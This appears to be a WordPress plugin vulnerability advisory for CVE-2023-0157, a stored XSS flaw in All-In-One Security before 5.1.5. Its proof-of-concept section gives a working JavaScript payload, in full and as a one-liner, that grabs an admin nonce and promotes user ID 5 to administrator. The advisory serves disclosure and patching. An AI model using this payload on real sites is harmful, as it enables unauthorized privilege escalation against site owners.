WordPress Plugin Vulnerabilities

All-In-One Security (AIOS) < 5.1.5 - Admin+ Stored XSS

Description

The plugin does not escape the content of log files before outputting it to the plugin admin page, allowing an authorized user (admin+) to plant bogus log files containing malicious JavaScript code that will be executed in the context of any administrator visiting this page.

Proof of Concept

Just create a test.pdf file with JavaScript content (necessarily in one line) and display the file in the Host system logs.

An example of a JavaScript payload increasing the privileges of a user with ID 5

<script>
fetch("https://<host>/wp-admin/users.php?update=promote")
    .then(function(response) {
        return response.text()
    })
    .then(function(html) {
        var parser = new DOMParser();
        var doc = parser.parseFromString(html, "text/html");

        return doc.querySelector("#_wpnonce").value;
    })
    .then(function(nonce) {
        fetch("https://<host>/wp-admin/users.php?s=&_wpnonce=" + nonce + "&_wp_http_referer=%2Fwp-admin%2Fusers.php&action=-1&new_role=administrator&changeit=Zmie%C5%84&paged=1&users%5B%5D=5&action2=-1&new_role2=administrator")
        .then(function(response) {
        console.log(response.text());
        })
        .catch(function(err) {  
        console.log('Failed to fetch page: ', err);  
        });
    })
    .catch(function(err) {  
        console.log('Failed to fetch page: ', err);  
});
</script>



Oneliner:

fetch("https://<host>/wp-admin/users.php?update=promote").then(function(response) {return response.text()}).then(function(html) {var parser = new DOMParser();var doc = parser.parseFromString(html, "text/html");return doc.querySelector("#_wpnonce").value;}).then(function(nonce) {fetch("https://<host>/wp-admin/users.php?s=&_wpnonce=" + nonce + "&_wp_http_referer=%2Fwp-admin%2Fusers.php&action=-1&new_role=administrator&changeit=Zmie%C5%84&paged=1&users%5B%5D=5&action2=-1&new_role2=administrator").then(function(response) {console.log(response.text());}).catch(function(err) {console.log('Failed to fetch page: ', err);  });}).catch(function(err) {console.log('Failed to fetch page: ', err);});

Replace values with <> signs.

Affects Plugins

Plugin icon
all-in-one-wp-security-and-firewall
Fixed in 5.1.5

References

CVE
CVE-2023-0157

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
3.4 (low)

Miscellaneous

Original Researcher
Bartłomiej Marek
Submitter
Bartłomiej Marek
Verified
Yes
WPVDB ID
8248b550-6485-4108-a701-8446ffa35f06

Timeline

Publicly Published
2023-03-20 (about 1 years ago)
Added
2023-03-20 (about 1 years ago)
Last Updated
2023-03-20 (about 1 years ago)

Other

Published
Title
Published
2022-08-22
Title
Classima < 2.1.11 - Reflected Cross-Site Scripting
Published
2024-03-25
Title
WC Builder < 1.0.19 - Authenticated (Contributor+) Stored Cross-Site Scripting
Published
2023-06-02
Title
Download SpamReferrerBlock <= 2.22 - Admin+ Stored XSS
Published
2022-06-20
Title
Give < 2.21.0 - Reflected Cross-Site Scripting
Published
2024-02-26
Title
postMash – custom post order <= 1.2.0 - Reflected Cross-Site Scripting via m